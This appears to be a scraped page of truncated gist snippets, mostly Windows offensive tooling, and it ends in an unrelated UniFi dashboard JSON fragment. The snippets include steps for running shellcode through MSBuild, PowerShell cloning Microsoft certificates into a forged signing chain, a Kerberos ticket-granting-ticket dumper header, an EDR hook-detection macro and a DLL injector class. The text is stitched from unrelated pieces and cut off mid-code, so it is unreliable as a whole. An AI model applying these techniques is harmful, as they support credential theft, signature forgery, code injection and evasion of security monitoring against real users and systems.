1. Open PowerShell
2. Set MSbuild GodMode Env Variable
$env:MSBUILDENABLEALLPROPERTYFUNCTIONS = 1
3. Execute C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe msbuild.png.xml
Note: this "serves" the shellcode from a memory-mapped file.
It is not accessible to other processes.
Change in line 62 in shellcode.cs. Manual offsets just to troll you. :)
I leave this for you to explore
syscall = 0 | |
exit = 1 | |
fork = 2 | |
read = 3 | |
write = 4 | |
open = 5 | |
close = 6 | |
wait4 = 7 | |
link = 9 | |
unlink = 10 |
# We'll just store the cloned certificates in current user "Personal" store for now. | |
$CertStoreLocation = @{ CertStoreLocation = 'Cert:\CurrentUser\My' } | |
$MS_Root_Cert = Get-PfxCertificate -FilePath C:\Test\MSKernel32Root.cer | |
$Cloned_MS_Root_Cert = New-SelfSignedCertificate -CloneCert $MS_Root_Cert @CertStoreLocation | |
$MS_PCA_Cert = Get-PfxCertificate -FilePath C:\Test\MSKernel32PCA.cer | |
$Cloned_MS_PCA_Cert = New-SelfSignedCertificate -CloneCert $MS_PCA_Cert -Signer $Cloned_MS_Root_Cert @CertStoreLocation | |
$MS_Leaf_Cert = Get-PfxCertificate -FilePath C:\Test\MSKernel32Leaf.cer |
function Get-KerberosTicketGrantingTicket | |
{ | |
<# | |
.SYNOPSIS | |
Gets the Kerberos Tickets Granting Tickets from all Logon Sessions | |
.DESCRIPTION | |
Get-KerberosTicketGrantingTicket uses the Local Security Authority (LSA) functions to enumerate Kerberos logon sessions and return their associate Kerberos Ticket Granting Tickets. |
' Win32 imports used by the hook-check macro below (PtrSafe/LongPtr: 64-bit VBA declarations).
' GetModuleHandleA: returns the handle of a module already loaded in this process, by name.
Private Declare PtrSafe Function GetModuleHandleA Lib "KERNEL32" (ByVal lpModuleName As String) As LongPtr | |
' GetProcAddress: returns the address of the named export inside hModule.
Private Declare PtrSafe Function GetProcAddress Lib "KERNEL32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr | |
' CopyMemory is an alias for RtlMoveMemory: copies Length bytes from Source to Destination.
' NOTE(review): Length is a 32-bit Long while the addresses are LongPtr — fine for small reads, confirm for large copies.
Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long) | |
'VBA Macro that detects hooks made by EDRs | |
'PoC By Juan Manuel Fernandez (@TheXC3LL) based on a post from SpecterOps (https://posts.specterops.io/adventures-in-dynamic-evasion-1fe0bac57aa) | |
Public Function checkHook(ByVal target As String, hModule As LongPtr) As Integer | |
Dim address As LongPtr |
using System; | |
using System.Collections.Generic; | |
using System.Linq; | |
using System.Text; | |
using System.Runtime.InteropServices; | |
namespace DllInjector | |
{ | |
public static class DllInjector | |
{ |
using System; | |
using System.Reflection; | |
using System.Runtime.CompilerServices; | |
using System.Text; | |
namespace ConsoleApp1 | |
{ | |
unsafe class Program | |
{ | |
static void Main(string[] args) |
static class Program | |
{ | |
/// <summary>
/// P/Invoke for kernel32!LoadLibrary: loads the named module into the calling process
/// and returns its module handle (IntPtr.Zero on failure per the Win32 contract; the
/// Win32 error is then available via Marshal.GetLastWin32Error() because SetLastError is true).
/// NOTE(review): no CharSet is specified, so the string marshals as ANSI by default —
/// set CharSet = CharSet.Unicode if non-ASCII paths are expected.
/// </summary>
/// <param name="dllToLoad">Module name or path passed through unchanged to the native call.</param>
[DllImport("kernel32.dll", SetLastError = true)] | |
public static extern IntPtr LoadLibrary(string dllToLoad); | |
/// <summary>
/// P/Invoke for kernel32!GetProcAddress: resolves an exported function by name within
/// an already-loaded module and returns its address (IntPtr.Zero on failure per the Win32 contract).
/// NOTE(review): unlike LoadLibrary above, SetLastError is not set, so a failed lookup
/// cannot be diagnosed with Marshal.GetLastWin32Error(); consider SetLastError = true.
/// </summary>
/// <param name="hModule">Module handle, typically the value returned by LoadLibrary.</param>
/// <param name="procedureName">Export name, marshalled as ANSI by default.</param>
[DllImport("kernel32.dll")] | |
public static extern IntPtr GetProcAddress(IntPtr hModule, string procedureName); | |
static void Main() | |
{ |
#include <stdio.h> | |
/* Defines a char array placed in the executable .text section, prefixed by a 10-byte
   stub and followed by the string bytes. The stub (e8 00 00 00 00 / 58 / 83 c0 05 / c3)
   reads as an x86 call-to-next-instruction, pop, add 5, ret — i.e. it appears to return
   the address of the bytes that follow it. The 32-bit add (83 c0 05) suggests it assumes
   the address fits in 32 bits — confirm on a 64-bit target. GCC/Clang-only syntax. */
#define DECLARE_STRING(var, str) __attribute__((section(".text"))) char var[] = "\xe8\x00\x00\x00\x00\x58\x83\xc0\x05\xc3" str; | |
/* Treats `var` as a function returning char* and calls it, yielding the string's
   address via the stub above; this is why the array must live in an executable section. */
#define REF_STRING(var) ((char*(*)())var)() | |
/* Two strings embedded with the stub; read back with REF_STRING(data1) / REF_STRING(data2). */
DECLARE_STRING(data1, "Hello, World!\n"); | |
DECLARE_STRING(data2, "Goodbye, World!\n"); | |
int main(int , char** ) |
gi{"name":"Overview","desc":"System Overview","controller_version":"5.10.12","modules":[{"id":"default:mega|status","module_id":"mega|status","restrictions":{"removable":false,"draggable":false},"config":{}},{"module_id":"internet-connection","config":{},"id":"dd5f7461-f8f0-4017-859c-3d9271b673bf"},{"module_id":"summary|wifi","config":{},"id":"13a78652-ad84-4fcb-943a-86929c638353"},{"module_id":"clients|freq-distribution","config":{"palette":"BLUE_GRADIENT_10"},"id":"c9626f4f-021f-4d46-b22d-86007570bac7"},{"module_id":"clients|top5|active","config":{"trafficType":"total"},"id":"36a9e071-132e-4b4a-baee-250449a6d44f"},{"module_id":"devices|uap|top5|channel-util","config":{"trafficType":"total"},"id":"9803f077-b9cd-4db0-b466-60d92fae2020"},{"module_id":"devices|uap|top5|active","config":{"trafficType":"total"},"id":"e6133049-cc56-44b3-a4c2-b0843912dac5"},{"module_id":"devices|uap|top5|client-count","config":{},"id":"d39f9c80-1827-4ba0-b573-3209789c56b5"},{"module_id":"summary|switching","config":{},"id":"5966437 |